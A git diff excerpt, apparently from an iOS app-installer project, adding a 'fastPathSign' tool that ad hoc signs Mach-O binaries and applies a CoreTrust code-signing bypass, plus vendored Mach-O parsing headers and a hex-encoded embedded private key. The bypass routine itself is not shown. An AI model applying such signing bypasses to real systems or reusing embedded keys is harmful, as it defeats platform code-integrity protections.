0x59, 0x2f, 0x6b, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x44, 0x45, 0x52, 0x32,
0x56, 0x49, 0x38, 0x7a, 0x4f, 0x6a, 0x62, 0x64, 0x6e, 0x41, 0x52, 0x41,
0x55, 0x77, 0x31, 0x65, 0x49, 0x59, 0x67, 0x4f, 0x47, 0x58, 0x69, 0x6b,
0x30, 0x65, 0x6c, 0x45, 0x37, 0x4c, 0x0a, 0x65, 0x52, 0x54, 0x53, 0x77,
0x59, 0x37, 0x78, 0x41, 0x51, 0x69, 0x36, 0x34, 0x46, 0x45, 0x53, 0x62,
0x59, 0x59, 0x73, 0x38, 0x6d, 0x64, 0x78, 0x45, 0x56, 0x37, 0x58, 0x38,
0x52, 0x4e, 0x77, 0x66, 0x70, 0x67, 0x51, 0x70, 0x50, 0x39, 0x6f, 0x70,
0x6e, 0x55, 0x2f, 0x57, 0x5a, 0x5a, 0x62, 0x47, 0x55, 0x66, 0x71, 0x34,
0x71, 0x4b, 0x69, 0x36, 0x47, 0x68, 0x51, 0x37, 0x4d, 0x6d, 0x51, 0x0a,
0x66, 0x4b, 0x4c, 0x47, 0x58, 0x71, 0x35, 0x57, 0x48, 0x6d, 0x36, 0x57,
0x4d, 0x48, 0x76, 0x45, 0x7a, 0x6f, 0x6f, 0x4f, 0x35, 0x35, 0x75, 0x6a,
0x77, 0x78, 0x2b, 0x71, 0x69, 0x69, 0x56, 0x2b, 0x5a, 0x38, 0x52, 0x38,
0x49, 0x59, 0x73, 0x30, 0x6e, 0x62, 0x4d, 0x54, 0x6e, 0x51, 0x70, 0x45,
0x55, 0x72, 0x73, 0x2f, 0x4d, 0x41, 0x65, 0x36, 0x5a, 0x4c, 0x73, 0x7a,
0x50, 0x36, 0x4c, 0x6f, 0x0a, 0x67, 0x69, 0x6d, 0x62, 0x55, 0x51, 0x4f,
0x42, 0x71, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x43, 0x68, 0x78, 0x31, 0x61,
0x53, 0x6c, 0x38, 0x6d, 0x68, 0x58, 0x6a, 0x2b, 0x53, 0x41, 0x73, 0x58,
0x48, 0x74, 0x54, 0x31, 0x56, 0x43, 0x33, 0x44, 0x75, 0x56, 0x4f, 0x68,
0x36, 0x74, 0x57, 0x4f, 0x72, 0x34, 0x6b, 0x38, 0x79, 0x32, 0x54, 0x73,
0x34, 0x6d, 0x6e, 0x2b, 0x4c, 0x61, 0x48, 0x6d, 0x44, 0x0a, 0x77, 0x4b,
0x71, 0x52, 0x4b, 0x2b, 0x43, 0x56, 0x64, 0x30, 0x46, 0x49, 0x31, 0x66,
0x32, 0x37, 0x43, 0x6c, 0x4c, 0x64, 0x6e, 0x37, 0x62, 0x72, 0x6b, 0x4c,
0x6e, 0x4c, 0x69, 0x63, 0x68, 0x6f, 0x57, 0x57, 0x6e, 0x79, 0x68, 0x33,
0x71, 0x6a, 0x64, 0x46, 0x4a, 0x68, 0x34, 0x75, 0x62, 0x44, 0x53, 0x67,
0x2b, 0x36, 0x79, 0x45, 0x75, 0x47, 0x2f, 0x4a, 0x66, 0x7a, 0x34, 0x35,
0x78, 0x35, 0x0a, 0x35, 0x34, 0x78, 0x4d, 0x79, 0x61, 0x4e, 0x66, 0x73,
0x39, 0x4b, 0x6d, 0x4d, 0x35, 0x36, 0x35, 0x55, 0x48, 0x6a, 0x54, 0x49,
0x4c, 0x58, 0x38, 0x65, 0x65, 0x62, 0x56, 0x55, 0x30, 0x65, 0x72, 0x58,
0x54, 0x35, 0x48, 0x4b, 0x63, 0x4e, 0x73, 0x58, 0x7a, 0x2f, 0x68, 0x53,
0x42, 0x4e, 0x53, 0x2f, 0x4a, 0x58, 0x63, 0x72, 0x33, 0x55, 0x50, 0x45,
0x51, 0x4b, 0x42, 0x67, 0x44, 0x6d, 0x30, 0x0a, 0x30, 0x2b, 0x35, 0x79,
0x73, 0x6b, 0x66, 0x6d, 0x55, 0x42, 0x4c, 0x61, 0x37, 0x4c, 0x76, 0x43,
0x35, 0x6b, 0x70, 0x56, 0x2b, 0x66, 0x31, 0x58, 0x78, 0x2f, 0x79, 0x70,
0x6c, 0x64, 0x44, 0x30, 0x74, 0x45, 0x36, 0x53, 0x59, 0x62, 0x67, 0x78,
0x6d, 0x61, 0x4e, 0x33, 0x74, 0x39, 0x34, 0x33, 0x48, 0x53, 0x2b, 0x78,
0x78, 0x50, 0x2f, 0x56, 0x48, 0x35, 0x46, 0x56, 0x61, 0x32, 0x57, 0x7a,
0x0a, 0x6b, 0x6e, 0x6d, 0x79, 0x53, 0x50, 0x55, 0x33, 0x6d, 0x31, 0x6b,
0x59, 0x75, 0x62, 0x2f, 0x6d, 0x32, 0x75, 0x49, 0x50, 0x35, 0x38, 0x6b,
0x46, 0x6b, 0x30, 0x58, 0x58, 0x6d, 0x42, 0x74, 0x47, 0x79, 0x59, 0x53,
0x51, 0x36, 0x61, 0x69, 0x67, 0x49, 0x64, 0x73, 0x2b, 0x50, 0x65, 0x56,
0x4b, 0x35, 0x41, 0x51, 0x6c, 0x79, 0x2f, 0x69, 0x46, 0x73, 0x5a, 0x57,
0x75, 0x4c, 0x2f, 0x2f, 0x4e, 0x0a, 0x2b, 0x6c, 0x4b, 0x55, 0x65, 0x68,
0x7a, 0x71, 0x45, 0x48, 0x41, 0x2f, 0x78, 0x33, 0x6a, 0x32, 0x36, 0x64,
0x35, 0x56, 0x2f, 0x4b, 0x2b, 0x73, 0x56, 0x65, 0x31, 0x6e, 0x56, 0x44,
0x6f, 0x50, 0x71, 0x72, 0x50, 0x6a, 0x53, 0x61, 0x69, 0x68, 0x41, 0x6f,
0x47, 0x41, 0x46, 0x6e, 0x47, 0x6c, 0x6f, 0x68, 0x45, 0x53, 0x54, 0x35,
0x36, 0x54, 0x6f, 0x44, 0x35, 0x74, 0x4d, 0x34, 0x73, 0x77, 0x0a, 0x30,
0x4e, 0x5a, 0x73, 0x49, 0x4c, 0x35, 0x35, 0x4f, 0x68, 0x58, 0x6e, 0x75,
0x69, 0x50, 0x32, 0x69, 0x65, 0x78, 0x33, 0x47, 0x65, 0x78, 0x2f, 0x4e,
0x7a, 0x61, 0x48, 0x49, 0x42, 0x4c, 0x76, 0x33, 0x42, 0x55, 0x30, 0x77,
0x35, 0x4d, 0x50, 0x71, 0x4f, 0x49, 0x65, 0x44, 0x37, 0x31, 0x56, 0x6d,
0x6b, 0x49, 0x77, 0x6b, 0x2b, 0x2b, 0x68, 0x76, 0x44, 0x57, 0x57, 0x2b,
0x35, 0x56, 0x4a, 0x0a, 0x49, 0x50, 0x74, 0x75, 0x6f, 0x51, 0x34, 0x6e,
0x69, 0x30, 0x66, 0x61, 0x35, 0x62, 0x63, 0x6a, 0x32, 0x6d, 0x35, 0x66,
0x78, 0x66, 0x6a, 0x48, 0x37, 0x4b, 0x52, 0x5a, 0x63, 0x52, 0x35, 0x68,
0x2f, 0x61, 0x73, 0x66, 0x31, 0x72, 0x54, 0x33, 0x66, 0x73, 0x4b, 0x48,
0x61, 0x48, 0x37, 0x61, 0x71, 0x6a, 0x53, 0x6b, 0x79, 0x36, 0x30, 0x50,
0x72, 0x47, 0x46, 0x77, 0x68, 0x4a, 0x2b, 0x46, 0x0a, 0x47, 0x67, 0x4c,
0x37, 0x41, 0x54, 0x62, 0x4c, 0x48, 0x70, 0x53, 0x74, 0x6c, 0x67, 0x6b,
0x77, 0x4e, 0x70, 0x69, 0x59, 0x6d, 0x31, 0x67, 0x3d, 0x0a, 0x2d, 0x2d,
0x2d, 0x2d, 0x2d, 0x45, 0x4e, 0x44, 0x20, 0x50, 0x52, 0x49, 0x56, 0x41,
0x54, 0x45, 0x20, 0x4b, 0x45, 0x59, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x0a
};
unsigned int ca_key_len = 1704;

16
Exploits/fastPathSign/src/external/include/choma/SignOSSL.h vendored Normal file
View File

@ -0,0 +1,16 @@
#ifndef SIGN_OSSL_H
#define SIGN_OSSL_H
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pem.h>
#include <openssl/rsa.h>
#include <openssl/sha.h>
#include <openssl/err.h>
unsigned char *signWithRSA(unsigned char *inputData, size_t inputDataLength, size_t *outputDataLength);
#endif // SIGN_OSSL_H
// 0xA422

12
Exploits/fastPathSign/src/external/include/choma/Signing.h vendored Normal file
View File

@ -0,0 +1,12 @@
#ifndef SIGNING_H
#define SIGNING_H
#include <stdio.h>
#include <stdlib.h>
#include <CommonCrypto/CommonCrypto.h>
#include <Security/SecKey.h>
#include <Security/Security.h>
// int signWithRSA(const char *certificateFile, const char *inputFile, const char *outputFile);
#endif // SIGNING_H

6
Exploits/fastPathSign/src/external/include/choma/Util.h vendored Normal file
View File

@ -0,0 +1,6 @@
#include <stdint.h>
#include <stdlib.h>
uint64_t align_to_size(int size, int alignment);
int count_digits(int64_t num);
void print_hash(uint8_t *hash, size_t size);

BIN
Exploits/fastPathSign/src/external/lib/libchoma.a vendored Normal file
View File

Binary file not shown.

86
Exploits/fastPathSign/src/main.c Normal file
View File

@ -0,0 +1,86 @@
#include "adhoc.h"
#include "coretrust_bug.h"
#include <choma/FAT.h>
#include <choma/MachO.h>
#include <choma/FileStream.h>
#include <choma/Host.h>
#include <copyfile.h>
char *extract_preferred_slice(const char *fatPath)
{
FAT *fat = fat_init_from_path(fatPath);
if (!fat) return NULL;
MachO *macho = fat_find_preferred_slice(fat);
if (!macho) return NULL;
char *temp = strdup("/tmp/XXXXXX");
int fd = mkstemp(temp);
MemoryStream *outStream = file_stream_init_from_path(temp, 0, 0, FILE_STREAM_FLAG_WRITABLE | FILE_STREAM_FLAG_AUTO_EXPAND);
MemoryStream *machoStream = macho_get_stream(macho);
memory_stream_copy_data(machoStream, 0, outStream, 0, memory_stream_get_size(machoStream));
fat_free(fat);
memory_stream_free(outStream);
close(fd);
return temp;
}
int apply_coretrust_bypass_wrapper(const char *inputPath, const char *outputPath)
{
char *machoPath = extract_preferred_slice(inputPath);
printf("extracted best slice to %s\n", machoPath);
int r = apply_coretrust_bypass(machoPath);
if (r != 0) {
free(machoPath);
return r;
}
r = copyfile(machoPath, outputPath, 0, COPYFILE_ALL | COPYFILE_MOVE | COPYFILE_UNLINK);
if (r == 0) {
chmod(outputPath, 0755);
printf("Signed file! CoreTrust bypass eta now!!\n");
}
else {
perror("copyfile");
}
free(machoPath);
return r;
}
int main(int argc, char *argv[]) {
if (argc != 2) return -1;
char *machoPath = extract_preferred_slice(argv[1]);
printf("Extracted best slice to %s\n", machoPath);
int r = binary_sign_adhoc(machoPath, true);
if (r != 0) {
printf("Failed adhoc signing (%d) Continuing anyways...\n", r);
}
else {
printf("AdHoc signed file!\n");
}
printf("Applying CoreTrust bypass...\n");
if (apply_coretrust_bypass(machoPath) != 0) {
printf("Failed applying CoreTrust bypass\n");
return -1;
}
if (copyfile(machoPath, argv[1], 0, COPYFILE_ALL | COPYFILE_MOVE | COPYFILE_UNLINK) == 0) {
chmod(argv[1], 0755);
printf("Applied CoreTrust Bypass!\n");
}
else {
perror("copyfile");
return -1;
}
free(machoPath);
return 0;
}

3
Makefile
View File

@ -6,6 +6,9 @@ pre_build:
@rm -rf ./_build 2>/dev/null || true @rm -rf ./_build 2>/dev/null || true
@mkdir -p ./_build @mkdir -p ./_build
make_external:
make_roothelper: make_roothelper:
@$(MAKE) -C ./RootHelper FINALPACKAGE=1 $(MAKECMDGOALS) @$(MAKE) -C ./RootHelper FINALPACKAGE=1 $(MAKECMDGOALS)

5
RootHelper/Makefile
View File

@ -5,8 +5,9 @@ include $(THEOS)/makefiles/common.mk
TOOL_NAME = trollstorehelper TOOL_NAME = trollstorehelper
trollstorehelper_FILES = $(wildcard *.m) $(wildcard ../Shared/*.m) trollstorehelper_FILES = $(wildcard *.m) $(wildcard ../Shared/*.m) ../Exploits/fastPathSign/src/coretrust_bug.c ../Exploits/fastPathSign/src/adhoc.m
trollstorehelper_CFLAGS = -fobjc-arc -I../Shared trollstorehelper_CFLAGS = -fobjc-arc -I../Shared $(shell pkg-config --cflags libcrypto) -Iexternal/include -I../Exploits/fastPathSign/src
trollstorehelper_LDFLAGS = -Lexternal/lib -lcrypto -lchoma
trollstorehelper_CODESIGN_FLAGS = -Sentitlements.plist -K../cert.p12 trollstorehelper_CODESIGN_FLAGS = -Sentitlements.plist -K../cert.p12
trollstorehelper_INSTALL_PATH = /usr/local/bin trollstorehelper_INSTALL_PATH = /usr/local/bin
trollstorehelper_LIBRARIES = archive trollstorehelper_LIBRARIES = archive

11
RootHelper/external/include/choma/Base64.h vendored Normal file
View File

@ -0,0 +1,11 @@
#ifndef BASE64_H
#define BASE64_H
#include <stdint.h>
#include <stdlib.h>
char *base64_encode(const unsigned char *data,
size_t input_length,
size_t *output_length);
#endif // BASE64_H

19
RootHelper/external/include/choma/BufferedStream.h vendored Normal file
View File

@ -0,0 +1,19 @@
#ifndef BUFFERED_STREAM_H
#define BUFFERED_STREAM_H
#include "MemoryStream.h"
#include <stdbool.h>
#define BUFFERED_STREAM_FLAG_AUTO_EXPAND (1 << 0)
typedef struct BufferedStreamContext {
uint8_t *buffer;
size_t bufferSize;
uint32_t subBufferStart;
size_t subBufferSize;
} BufferedStreamContext;
MemoryStream *buffered_stream_init_from_buffer_nocopy(void *buffer, size_t bufferSize, uint32_t flags);
MemoryStream *buffered_stream_init_from_buffer(void *buffer, size_t bufferSize, uint32_t flags);
#endif // BUFFERED_STREAM_H

108
RootHelper/external/include/choma/CSBlob.h vendored Normal file
View File

@ -0,0 +1,108 @@
#ifndef CS_BLOB_H
#define CS_BLOB_H
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include "FAT.h"
#include "MachO.h"
#include "MemoryStream.h"
// Blob index
typedef struct __BlobIndex {
uint32_t type;
uint32_t offset;
} CS_BlobIndex;
// CMS superblob
typedef struct __SuperBlob {
uint32_t magic;
uint32_t length;
uint32_t count;
CS_BlobIndex index[];
} CS_SuperBlob;
typedef struct __GenericBlob {
uint32_t magic; /* magic number */
uint32_t length; /* total length of blob */
char data[];
} CS_GenericBlob;
// CMS blob magic types
enum {
CSBLOB_REQUIREMENT = 0xfade0c00,
CSBLOB_REQUIREMENTS = 0xfade0c01,
CSBLOB_CODEDIRECTORY = 0xfade0c02,
CSBLOB_EMBEDDED_SIGNATURE = 0xfade0cc0,
CSBLOB_DETACHED_SIGNATURE = 0xfade0cc1,
CSBLOB_ENTITLEMENTS = 0xfade7171,
CSBLOB_DER_ENTITLEMENTS = 0xfade7172,
CSBLOB_SIGNATURE_BLOB = 0xfade0b01
} CS_BlobType;
enum {
CSSLOT_CODEDIRECTORY = 0,
CSSLOT_INFOSLOT = 1,
CSSLOT_REQUIREMENTS = 2,
CSSLOT_RESOURCEDIR = 3,
CSSLOT_APPLICATION = 4,
CSSLOT_ENTITLEMENTS = 5,
CSSLOT_DER_ENTITLEMENTS = 7,
CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000,
CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5,
CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX,
CSSLOT_SIGNATURESLOT = 0x10000
} CS_SlotType;
typedef struct s_CS_DecodedBlob {
struct s_CS_DecodedBlob *next;
uint32_t type;
MemoryStream *stream;
} CS_DecodedBlob;
typedef struct s_CS_DecodedSuperBlob {
uint32_t magic;
struct s_CS_DecodedBlob *firstBlob;
} CS_DecodedSuperBlob;
// Convert blob magic to readable blob type string
char *cs_blob_magic_to_string(int magic);
// Extract Code Signature to file
int macho_extract_cs_to_file(MachO *macho, CS_SuperBlob *superblob);
void macho_find_code_signature_bounds(MachO *macho, uint32_t *offsetOut, uint32_t *sizeOut);
CS_SuperBlob *macho_read_code_signature(MachO *macho);
int macho_replace_code_signature(MachO *macho, CS_SuperBlob *superblob);
int update_load_commands(MachO *macho, CS_SuperBlob *superblob, uint64_t originalSize);
CS_DecodedBlob *csd_blob_init(uint32_t type, CS_GenericBlob *blobData);
int csd_blob_read(CS_DecodedBlob *blob, uint64_t offset, size_t size, void *outBuf);
int csd_blob_write(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf);
int csd_blob_insert(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf);
int csd_blob_delete(CS_DecodedBlob *blob, uint64_t offset, size_t size);
int csd_blob_read_string(CS_DecodedBlob *blob, uint64_t offset, char **outString);
int csd_blob_write_string(CS_DecodedBlob *blob, uint64_t offset, const char *string);
int csd_blob_get_size(CS_DecodedBlob *blob);
uint32_t csd_blob_get_type(CS_DecodedBlob *blob);
void csd_blob_set_type(CS_DecodedBlob *blob, uint32_t type);
void csd_blob_free(CS_DecodedBlob *blob);
CS_DecodedSuperBlob *csd_superblob_decode(CS_SuperBlob *superblob);
CS_SuperBlob *csd_superblob_encode(CS_DecodedSuperBlob *decodedSuperblob);
CS_DecodedBlob *csd_superblob_find_blob(CS_DecodedSuperBlob *superblob, uint32_t type, uint32_t *indexOut);
int csd_superblob_insert_blob_after_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, CS_DecodedBlob *afterBlob);
int csd_superblob_insert_blob_at_index(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, uint32_t atIndex);
int csd_superblob_append_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToAppend);
int csd_superblob_remove_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToRemove); // <- Important: When calling this, caller is responsible for freeing blobToRemove
int csd_superblob_remove_blob_at_index(CS_DecodedSuperBlob *superblob, uint32_t atIndex);
int csd_superblob_print_content(CS_DecodedSuperBlob *decodedSuperblob, MachO *macho, bool printAllSlots, bool verifySlots);
void csd_superblob_free(CS_DecodedSuperBlob *decodedSuperblob);
#endif // CS_BLOB_H

53
RootHelper/external/include/choma/CodeDirectory.h vendored Normal file
View File

@ -0,0 +1,53 @@
#ifndef CODE_DIRECTORY_H
#define CODE_DIRECTORY_H
#include <stdint.h>
#include <math.h>
#include <CommonCrypto/CommonDigest.h>
#include "MachO.h"
#include "CSBlob.h"
#include "FAT.h"
#include "MachOByteOrder.h"
#include "MachOLoadCommand.h"
#include "MemoryStream.h"
// Code directory blob header
typedef struct __CodeDirectory {
uint32_t magic;
uint32_t length;
uint32_t version;
uint32_t flags;
uint32_t hashOffset;
uint32_t identOffset;
uint32_t nSpecialSlots;
uint32_t nCodeSlots;
uint32_t codeLimit;
uint8_t hashSize;
uint8_t hashType;
uint8_t spare1;
uint8_t pageSize;
uint32_t spare2;
uint32_t scatterOffset;
uint32_t teamOffset;
} CS_CodeDirectory;
enum CS_HashType {
CS_HASHTYPE_SHA160_160 = 1,
CS_HASHTYPE_SHA256_256 = 2,
CS_HASHTYPE_SHA256_160 = 3,
CS_HASHTYPE_SHA384_384 = 4,
};
char *csd_code_directory_copy_identity(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut);
char *csd_code_directory_copy_team_id(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut);
int csd_code_directory_set_team_id(CS_DecodedBlob *codeDirBlob, char *newTeamID);
uint32_t csd_code_directory_get_flags(CS_DecodedBlob *codeDirBlob);
void csd_code_directory_set_flags(CS_DecodedBlob *codeDirBlob, uint32_t flags);
uint8_t csd_code_directory_get_hash_type(CS_DecodedBlob *codeDirBlob);
void csd_code_directory_set_hash_type(CS_DecodedBlob *codeDirBlob, uint8_t hashType);
int csd_code_directory_print_content(CS_DecodedBlob *codeDirBlob, MachO *macho, bool printSlots, bool verifySlots);
void csd_code_directory_update(CS_DecodedBlob *codeDirBlob, MachO *macho);
#endif // CODE_DIRECTORY_H

41
RootHelper/external/include/choma/FAT.h vendored Normal file
View File

@ -0,0 +1,41 @@
#ifndef MACHO_H
#define MACHO_H
#include <stdio.h>
#include <libkern/OSByteOrder.h>
#include <mach/mach.h>
#include <mach-o/loader.h>
#include <mach-o/fat.h>
#include <sys/stat.h>
#include "MemoryStream.h"
typedef struct MachO MachO;
// A FAT structure can either represent a FAT file with multiple slices, in which the slices will be loaded into the slices attribute
// Or a single slice MachO, in which case it serves as a compatibility layer and the single slice will also be loaded into the slices attribute
typedef struct FAT
{
MemoryStream *stream;
MachO **slices;
uint32_t slicesCount;
int fileDescriptor;
} FAT;
int fat_read_at_offset(FAT *fat, uint64_t offset, size_t size, void *outBuf);
MemoryStream *fat_get_stream(FAT *fat);
// Initialise a FAT structure from a memory stream
FAT *fat_init_from_memory_stream(MemoryStream *stream);
// Initialise a FAT structure using the path to the file
FAT *fat_init_from_path(const char *filePath);
//FAT *fat_init_from_path_for_writing(const char *filePath);
// Find macho with cputype and cpusubtype in FAT, returns NULL if not found
MachO *fat_find_slice(FAT *fat, cpu_type_t cputype, cpu_subtype_t cpusubtype);
// Free all elements of the FAT structure
void fat_free(FAT *fat);
#endif // MACHO_H

21
RootHelper/external/include/choma/FileStream.h vendored Normal file
View File

@ -0,0 +1,21 @@
#ifndef FILE_STREAM_H
#define FILE_STREAM_H
#include "MemoryStream.h"
#define FILE_STREAM_SIZE_AUTO 0
#define FILE_STREAM_FLAG_WRITABLE (1 << 0)
#define FILE_STREAM_FLAG_AUTO_EXPAND (1 << 1)
typedef struct FileStreamContext {
int fd;
size_t fileSize;
uint32_t bufferStart;
size_t bufferSize;
} FileStreamContext;
MemoryStream *file_stream_init_from_file_descriptor_nodup(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
MemoryStream *file_stream_init_from_file_descriptor(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
MemoryStream *file_stream_init_from_path(const char *path, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
#endif // FILE_STREAM_H

10
RootHelper/external/include/choma/Host.h vendored Normal file
View File

@ -0,0 +1,10 @@
#ifndef HOST_H
#define HOST_H
#include "FAT.h"
// Retrieve the preferred MachO slice from a FAT
// Preferred slice as in the slice that the kernel would use when loading the file
MachO *fat_find_preferred_slice(FAT *fat);
#endif // HOST_H

62
RootHelper/external/include/choma/MachO.h vendored Normal file
View File

@ -0,0 +1,62 @@
#ifndef MACHO_SLICE_H
#define MACHO_SLICE_H
#include <stdbool.h>
#include <mach-o/fat.h>
#include <mach-o/loader.h>
#include "MemoryStream.h"
#include "FAT.h"
typedef struct MachOSegment
{
struct segment_command_64 command;
struct section_64 sections[];
} __attribute__((__packed__)) MachOSegment;
typedef struct FilesetMachO {
char *entry_id;
uint64_t vmaddr;
uint64_t fileoff;
FAT *underlyingMachO;
} FilesetMachO;
typedef struct MachO {
MemoryStream *stream;
bool isSupported;
struct mach_header_64 machHeader;
struct fat_arch_64 archDescriptor;
uint32_t filesetCount;
FilesetMachO *filesetMachos;
uint32_t segmentCount;
MachOSegment **segments;
} MachO;
// Read data from a MachO at a specified offset
int macho_read_at_offset(MachO *macho, uint64_t offset, size_t size, void *outBuf);
// Write data from a MachO at a specified offset, auto expands, only works if opened via macho_init_for_writing
int macho_write_at_offset(MachO *macho, uint64_t offset, size_t size, void *inBuf);
MemoryStream *macho_get_stream(MachO *macho);
uint32_t macho_get_filetype(MachO *macho);
// Perform translation between file offsets and virtual addresses
int macho_translate_fileoff_to_vmaddr(MachO *macho, uint64_t fileoff, uint64_t *vmaddrOut, MachOSegment **segmentOut);
int macho_translate_vmaddr_to_fileoff(MachO *macho, uint64_t vmaddr, uint64_t *fileoffOut, MachOSegment **segmentOut);
// Read data from a MachO at a specified virtual address
int macho_read_at_vmaddr(MachO *macho, uint64_t vmaddr, size_t size, void *outBuf);
int macho_enumerate_load_commands(MachO *macho, void (^enumeratorBlock)(struct load_command loadCommand, uint64_t offset, void *cmd, bool *stop));
// Initialise a MachO object from a MemoryStream and it's corresponding FAT arch descriptor
MachO *macho_init(MemoryStream *stream, struct fat_arch_64 archDescriptor);
// Initialize a single slice macho for writing to it
MachO *macho_init_for_writing(const char *filePath);
void macho_free(MachO *macho);
#endif // MACHO_SLICE_H

164
RootHelper/external/include/choma/MachOByteOrder.h vendored Normal file
View File

@ -0,0 +1,164 @@
#ifndef MACHO_BYTE_ORDER_H
#define MACHO_BYTE_ORDER_H
#include <stdio.h>
#include <stdlib.h>
// 8-bit integers needed for CodeDirectory
#define BIG_TO_HOST(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapBigToHostInt16(n), \
uint16_t: OSSwapBigToHostInt16(n), \
int32_t: OSSwapBigToHostInt32(n), \
uint32_t: OSSwapBigToHostInt32(n), \
int64_t: OSSwapBigToHostInt64(n), \
uint64_t: OSSwapBigToHostInt64(n) \
)
#define HOST_TO_BIG(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
uint16_t: OSSwapHostToBigInt16(n), \
int16_t: OSSwapHostToBigInt16(n), \
int32_t: OSSwapHostToBigInt32(n), \
uint32_t: OSSwapHostToBigInt32(n), \
int64_t: OSSwapHostToBigInt64(n), \
uint64_t: OSSwapHostToBigInt64(n) \
)
#define LITTLE_TO_HOST(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapLittleToHostInt16(n), \
uint16_t: OSSwapLittleToHostInt16(n), \
int32_t: OSSwapLittleToHostInt32(n), \
uint32_t: OSSwapLittleToHostInt32(n), \
int64_t: OSSwapLittleToHostInt64(n), \
uint64_t: OSSwapLittleToHostInt64(n) \
)
#define HOST_TO_LITTLE(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapHostToLittleInt16(n), \
uint16_t: OSSwapHostToLittleInt16(n), \
int32_t: OSSwapHostToLittleInt32(n), \
uint32_t: OSSwapHostToLittleInt32(n), \
int64_t: OSSwapHostToLittleInt64(n), \
uint64_t: OSSwapHostToLittleInt64(n) \
)
#define HOST_TO_LITTLE_APPLIER(instance, member) \
(instance)->member = HOST_TO_LITTLE((instance)->member)
#define HOST_TO_BIG_APPLIER(instance, member) \
(instance)->member = HOST_TO_BIG((instance)->member)
#define LITTLE_TO_HOST_APPLIER(instance, member) \
(instance)->member = LITTLE_TO_HOST((instance)->member)
#define BIG_TO_HOST_APPLIER(instance, member) \
(instance)->member = BIG_TO_HOST((instance)->member)
#define FAT_HEADER_APPLY_BYTE_ORDER(fh, applier) \
applier(fh, magic); \
applier(fh, nfat_arch);
#define FAT_ARCH_APPLY_BYTE_ORDER(arch, applier) \
applier(arch, cputype); \
applier(arch, cpusubtype); \
applier(arch, offset); \
applier(arch, size); \
applier(arch, align); \
#define FAT_ARCH_64_APPLY_BYTE_ORDER(arch, applier) \
applier(arch, cputype); \
applier(arch, cpusubtype); \
applier(arch, offset); \
applier(arch, size); \
applier(arch, align); \
applier(arch, reserved); \
#define MACH_HEADER_APPLY_BYTE_ORDER(mh, applier) \
applier(mh, magic); \
applier(mh, cputype); \
applier(mh, cpusubtype); \
applier(mh, filetype); \
applier(mh, ncmds); \
applier(mh, sizeofcmds); \
applier(mh, reserved);
#define LOAD_COMMAND_APPLY_BYTE_ORDER(lc, applier) \
applier(lc, cmd); \
applier(lc, cmdsize);
#define LINKEDIT_DATA_COMMAND_APPLY_BYTE_ORDER(lc, applier) \
applier(lc, cmd); \
applier(lc, cmdsize); \
applier(lc, dataoff); \
applier(lc, datasize);
#define BLOB_INDEX_APPLY_BYTE_ORDER(bi, applier) \
applier(bi, type); \
applier(bi, offset);
#define SUPERBLOB_APPLY_BYTE_ORDER(sb, applier) \
applier(sb, magic); \
applier(sb, length); \
applier(sb, count);
#define GENERIC_BLOB_APPLY_BYTE_ORDER(gb, applier) \
applier(gb, magic); \
applier(gb, length);
#define CODE_DIRECTORY_APPLY_BYTE_ORDER(cd, applier) \
applier(cd, magic); \
applier(cd, length); \
applier(cd, version); \
applier(cd, flags); \
applier(cd, hashOffset); \
applier(cd, identOffset); \
applier(cd, nSpecialSlots); \
applier(cd, nCodeSlots); \
applier(cd, codeLimit); \
applier(cd, hashSize); \
applier(cd, hashType); \
applier(cd, spare1); \
applier(cd, pageSize); \
applier(cd, spare2); \
applier(cd, scatterOffset); \
applier(cd, teamOffset);
#define SEGMENT_COMMAND_64_APPLY_BYTE_ORDER(sc64, applier) \
applier(sc64, cmd); \
applier(sc64, cmdsize); \
applier(sc64, fileoff); \
applier(sc64, filesize); \
applier(sc64, vmaddr); \
applier(sc64, vmsize); \
applier(sc64, flags); \
applier(sc64, initprot); \
applier(sc64, maxprot); \
applier(sc64, nsects);
#define SECTION_64_APPLY_BYTE_ORDER(sc64, applier) \
applier(sc64, addr); \
applier(sc64, align); \
applier(sc64, flags); \
applier(sc64, nreloc); \
applier(sc64, offset); \
applier(sc64, reserved1); \
applier(sc64, reserved2); \
applier(sc64, reserved3); \
applier(sc64, size);
#define FILESET_ENTRY_COMMAND_APPLY_BYTE_ORDER(fse, applier) \
applier(fse, cmd); \
applier(fse, cmdsize); \
applier(fse, vmaddr); \
applier(fse, fileoff); \
applier(fse, entry_id.offset); \
applier(fse, reserved); \
#endif // MACHO_BYTE_ORDER_H

16
RootHelper/external/include/choma/MachOLoadCommand.h vendored Normal file
View File

@ -0,0 +1,16 @@
#ifndef MACHO_LOAD_COMMAND_H
#define MACHO_LOAD_COMMAND_H
#include <mach-o/loader.h>
#include "MachO.h"
#include "CSBlob.h"
#include "FileStream.h"
#include "MachOByteOrder.h"
// Convert load command to load command name
char *load_command_to_string(int loadCommand);
void update_segment_command_64(MachO *macho, const char *segmentName, uint64_t vmaddr, uint64_t vmsize, uint64_t fileoff, uint64_t filesize);
void update_lc_code_signature(MachO *macho, uint64_t size);
